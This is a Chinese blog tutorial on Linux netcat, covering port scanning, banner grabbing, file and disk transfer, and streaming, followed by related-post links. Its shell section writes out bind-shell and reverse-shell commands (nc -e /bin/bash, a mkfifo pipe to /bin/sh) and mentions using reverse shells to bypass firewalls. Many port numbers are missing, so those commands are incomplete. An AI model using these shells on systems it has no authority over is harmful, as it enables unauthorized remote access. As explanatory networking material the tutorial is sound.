netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。

netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。

下面是一些使用netcat的例子.

[A(172.31.100.7) B(172.31.100.23)]

Linux netcat 命令实例:

1,端口扫描

端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。

$nc -z -v -n 172.31.100.7 -

可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.

z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换(谢谢@jxing 指点)

v 参数指使用冗余选项(译者注:即详细输出)

n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

这个命令会打印21到25 所有开放的端口。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。

一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。

$ nc -v 172.31.100.7 21

netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

2、Chat Server

假如你想和你的朋友聊聊,有很多的软件和信息服务可以供你使用。但是,如果你没有这么奢侈的配置,比如你在计算机实验室,所有的对外的连接都是被限制的,你怎样和整天坐在隔壁房间的朋友沟通那?不要郁闷了,netcat提供了这样一种方法,你只需要创建一个Chat服务器,一个预先确定好的端口,这样子他就可以联系到你了。

Server





$nc -l 1567




netcat 命令在1567端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。


Client




$nc 172.31.100.7 1567




不管你在机器B上键入什么都会出现在机器A上。


3,文件传输


大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端,以下,让A作为服务器,B为客户端。


Server




$nc -l  < file.txt




Client




$nc -n 172.31.100.7  > file.txt




这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。


在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt.


没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。


B作为Server


Server




$nc -l  > file.txt




Client




nc 172.31.100.23  < file.txt




4,目录传输


发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。


如果你想要通过网络传输一个目录从A到B。


Server




$tar -cvf – dir_name | nc -l 




Client




$nc -n 172.31.100.7  | tar -xvf -




这里在A服务器上,我们创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。


在客户端我们下载该压缩包通过netcat 管道然后打开文件。


如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。


Server




$tar -cvf – dir_name| bzip2 -z | nc -l 




通过bzip2压缩


Client




$nc -n 172.31.100.7  | bzip2 -d |tar -xvf -




使用bzip2解压


5. 加密你通过网络发送的数据


如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如mcrypt的工具加密。


服务端




$nc localhost  | mcrypt –flush –bare -F -q -d -m ecb > file.txt




使用mcrypt工具加密数据。


客户端




$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 




使用mcrypt工具解密数据。


以上两个命令会提示需要密码,确保两端使用相同的密码。


这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。


6. 流视频


虽然不是生成流视频的最好方法,但如果服务器上没有特定的工具,使用netcat,我们仍然有希望做成这件事。


服务端




$cat video.avi | nc -l 




这里我们只是从一个视频文件中读入并重定向输出到netcat客户端




$nc 172.31.100.7  | mplayer -vo x11 -cache  -




这里我们从socket中读入数据并重定向到mplayer。


7,克隆一个设备


如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。


克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上


Server




$dd if=/dev/sda | nc -l 




Client




$nc -n 172.31.100.7  | dd of=/dev/sda




dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。


8,打开一个shell


我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。


假设你的netcat支持 -c -e 参数(默认 netcat)


Server




$nc -l  -e /bin/bash -i




Client




$nc 172.31.100.7 




这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash


假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell


Server




$mkfifo /tmp/tmp_fifo

$cat /tmp/tmp_fifo | /bin/sh -i >& | nc -l  > /tmp/tmp_fifo




这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口1567上。至此,我们已经把netcat的输出重定向到fifo文件中。


说明:


从网络收到的输入写到fifo文件中


cat 命令读取fifo文件并且其内容发送给sh命令


sh命令进程受到输入并把它写回到netcat。


netcat 通过网络发送输出到client


至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。


在客户端仅仅简单连接到服务器


Client




$nc -n 172.31.100.7 




你会得到一个shell提示符在客户端


其它翻译版本 (1)


反向shell


反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。


服务端




$nc -l 




在客户端,简单地告诉netcat在连接完成后,执行shell。


客户端




$nc 172.31.100.7  -e /bin/bash




现在,什么是反向shell的特别之处呢 

反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为172.31.100.7,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。


10. 指定源端口


假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。


服务器端




$nc -l 




客户端




$nc 172.31.100.7  -p 




使用1024以内的端口需要root权限。


该命令将在客户端开启25端口用于通讯,否则将使用随机端口。


11. 指定源地址


假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。


服务器端




$nc -u -l  < file.txt




客户端




$nc -u 172.31.100.7  -s 172.31.100.5 > file.txt




该命令将绑定地址172.31.100.5。


这仅仅是使用netcat的一些示例。


其它用途有:


  • 使用-t选项模拟Telnet客户端,
    • 

  • HTTP客户端用于下载文件,
    • 

  • 连接到邮件服务器,使用SMTP协议检查邮件,
    • 

  • 使用ffmpeg截取屏幕并通过流式传输分享,等等。其它更多用途。


简单来说,只要你了解协议就可以使用netcat作为网络通讯媒介,实现各种客户端。
												


											
Netcat—瑞士军刀的更多相关文章
	

    
						
  1. netcat 瑞士军刀
		
    netcat被誉为网络安全界的‘瑞士军刀’,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据.它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动.同时,它也是一个功能强 ...
    
		
    2. 
								
  2. Netcat瑞士军刀的简单使用
		
    目录 Netcat 常用参数: 常见的用法: 端口扫描: 聊天 文件传输 反弹shell 蜜罐 Netcat Netcat 常称为 nc,拥有"瑞士军刀"的美誉.nc 小巧强悍,可 ...
    
		
    3. 
						
  3. netcat瑞士军刀实现电脑远程控制termux
		
    关于nc实现远程控制termux 1.首先termux安装namp pkg install namp 2.windows系统安装netcat 此为netcat下载连接 下载得到zip压缩包,解压得到里 ...
    
		
    4. 
						
  4. backtrack渗透测试中常用的命令总结
		
    ping 域名/ip 测试本机到远端主机是否联通. dig 域名/ip 查看域名解析的详细信息. host -l 域名 dns服务器 传输zone. 扫描 nmap: -sS 半开扫描TCP和SYN扫 ...
    
		
    5. 
						
  5. Windows操作系统及其安全机制
		
    kali视频学习请看 http://www.cnblogs.com/lidong20179210/p/8909569.html Windows操作系统及其安全机制 Windows文件系统 FAT (F ...
    
		
    6. 
						
  6. linux复习5
		
    权限----------------- r //100 = 4 //文件 :读取内容, //文件夹:是查看文件夹的内容 w //文件 :写数据到文件 //文件夹:增删文件. //10 = 2 x // ...
    
		
    7. 
						
  7. 2019.9.25使用BP和Hydra爆破相关的服务
		
    使用BP和Hydra爆破相关的服务. Hydra:九头蛇,开源的功能强大的爆破工具,支持的服务有很多,使用hydra爆破c/s架构的服务.使用bp爆破web登录端口. dvwa:web应用程序漏洞演练 ...
    
		
    8. 
						
  8. Windows PR提权
		
    目录 提权利用的漏洞 PR提权 提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalSer ...
    
		
    9. 
						
  9. Linux Netcat 命令——网络工具中的瑞士军刀
		
    原文:http://www.oschina.net/translate/linux-netcat-command netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. appium自动化 - android
			
    1. 获取driver appium通过生成driver来识别和操作app的UI元素.生成driver时,需要给出被测设备的相关信息.appium官方上的例子如下: https://github.co ...
    
			
    2. 
						
  2. oracle之约束-主键、非空、唯一、check、外键、默认
			
    --首先添加主键约束alter table studentadd constraint PK_student_sno primary key(sno) --删除约束alter table studen ...
    
			
    3. 
						
  3. BZOJ 3744 Gty的妹子序列 分块+树状数组
			
    具体分析见 搬来大佬博客 时间复杂度 O(nnlogn)O(n\sqrt nlogn)O(nn​logn) CODE #include <cmath> #include <cctyp ...
    
			
    4. 
						
  4. 基于steam的游戏销量预测 — PART 1 — 爬取steam游戏相关数据的爬虫
			
    语言:python 环境:ubuntu 爬取内容:steam游戏标签,评论,以及在 steamspy 爬取对应游戏的销量 使用相关:urllib,lxml,selenium,chrome 解释: 流程 ...
    
			
    5. 
						
  5. 查看nginx服务器状态
			
    编译安装时使用--with-http_stub_status_module开启状态页面模块 [root@proxy ~]# yum -y install gcc pcre-devel openssl- ...
    
			
    6. 
						
  6. table表格合并列中相同的内容
			
    方法一: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF- ...
    
			
    7. 
						
  7. 【集训队作业2018】count
			
    CSP后第一发Blog. 这道题没有一下子过掉,开始还推出了错的结论.在错误的生成函数里绕了好久-- 很显然的转笛卡尔树,一个笛卡尔树对应一种序列.只要考虑一个笛卡尔树是否合法. 贪心地填数发现,从根 ...
    
			
    8. 
						
  8. Apache反向代理解析二级目录/泛目录教程/apache反向代理/apache泛目录反向代理
			
    同nginx一样,apache解析目录不需要安装任何东西,在配置文件里加入解析规则即可.解析规则: <IfModule mod_proxy.c> ProxyPreserveHost On  ...
    
			
    9. 
						
  9. 在iOS开发中使用icon font的方法
			
    http://iconfont.cn/help/iconuse.html 在开发阿里数据iOS版客户端的时候,由于项目进度很紧,项目里的所有图标都是用最平常的背景图片方案来实现.而为了要兼容普通屏与R ...
    
			
    10. 
						
  10. js中几种动态创建元素并设置文本内容的比较,及性能测试。
			
    内容 1 appendChild (都兼容) 2.insertAdjacentHTML (都兼容) 3.innerHTML (都兼容) 4.createDocumentFragment (都兼容) 动 ...
    
			
    11.